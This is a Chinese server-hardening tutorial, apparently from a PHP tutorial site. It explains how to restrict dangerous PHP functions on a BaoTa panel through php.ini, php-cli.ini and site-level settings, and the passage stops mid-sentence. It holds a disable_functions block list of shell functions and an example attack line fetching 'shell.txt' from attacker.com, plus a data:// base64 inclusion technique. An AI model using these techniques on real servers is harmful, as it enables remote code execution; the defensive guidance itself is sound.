首页 > 文章 > php教程

禁用危险PHP函数，提升服务器安全

时间：2026-04-28 09:57:50 338浏览收藏

本文深入解析了在宝塔面板中安全、精准管理PHP危险函数禁用的完整方案：指出面板界面仅追加而非覆盖disable_functions配置的致命误区，强调必须手动编辑全局php.ini和独立的php-cli.ini文件以彻底清除或精确控制禁用列表，并同步关闭allow_url_fopen与allow_url_include两大高危选项；同时提供站点级精细化放行（如为Laravel队列单独启用proc_open）的实操路径，最后提醒务必分别验证Web和CLI双环境下的真实生效情况，避免静默失败带来的隐蔽风险——这不仅是配置技巧，更是生产环境中不可或缺的安全闭环实践。

宝塔面板中怎么彻底禁用危险的PHP系统函数_在禁用函数列表中手动添加特定命令

直接改 `disable_functions` 行，别信面板界面能删干净

宝塔面板的 PHP 设置页里那个“禁用函数”输入框，只是往 disable_functions 配置项末尾追加内容，不是覆盖重写。你清空它、保存、重启 PHP，putenv 和 proc_open 依然在列表里——因为它们被宝塔硬编码进底层模板了。真正生效的配置，是全局 php.ini 文件里那一整行。

必须跳过面板，手动编辑对应 PHP 版本的真实配置文件：

路径一般是 /www/server/php/84/etc/php.ini（把 84 换成你实际用的版本号）
用宝塔文件管理器或 SSH 打开，搜索 disable_functions =
把整行替换成你想要的完整列表，例如：disable_functions = exec,passthru,shell_exec,system,proc_get_status,ini_alter,dl,pfsockopen,syslog,readlink,symlink,popepassthru,stream_socket_server（注意：这里没写 putenv 和 proc_open）
保存后，必须执行 bt 16 或在面板「软件商店 → PHP → 设置 → 服务 → 重载配置」，只点“重启”不够

CLI 环境的 `disable_functions` 是另一套，不改照样报错

很多工具（比如 composer install、php artisan queue:work）走的是 PHP CLI 模式，用的是 php-cli.ini，和 Web 请求完全无关。你在面板里改了、php.ini 也改了，但 php-cli.ini 还锁着 proc_open，命令行一跑就报错。

检查并修改 CLI 配置：

路径通常是 /www/server/php/84/etc/php-cli.ini
同样搜索 disable_functions =，删掉不需要禁用的函数名
验证是否生效：运行 /www/server/php/84/bin/php -r "echo function_exists('proc_open') ? 'yes' : 'no';"，输出 yes 才算成功

只给某个站点开权限，别动全局配置

如果你只是某个 Laravel 或 ThinkPHP 站点要用 proc_open 跑队列，其他站点完全不需要，那全局放开就是给自己埋雷。宝塔支持站点级覆盖，优先级高于全局 php.ini。

操作路径：

宝塔 → 网站 → 找到目标站点 → 设置 → 配置文件 → 拉到最下面「PHP 配置文件」区域，点编辑
新增一行：disable_functions =（等号后留空），表示该站点清空所有禁用
或者更安全地写：disable_functions = exec,system,shell_exec,passthru（只禁用你真不想让它用的）
这个配置只影响该站点的 PHP-FPM 进程，不影响 CLI，也不影响其他网站

`disable_functions` 不是唯一防线，`allow_url_fopen` 和 `allow_url_include` 也得关

禁了 exec，不代表就安全了。file_get_contents('http://attacker.com/shell.txt') 还能远程拉恶意代码，include('data://text/plain;base64,...') 也能直接执行任意 PHP。这两项和 disable_functions 是平行防线，漏一个都可能被绕过。

在同一个 php.ini 文件里一起关掉：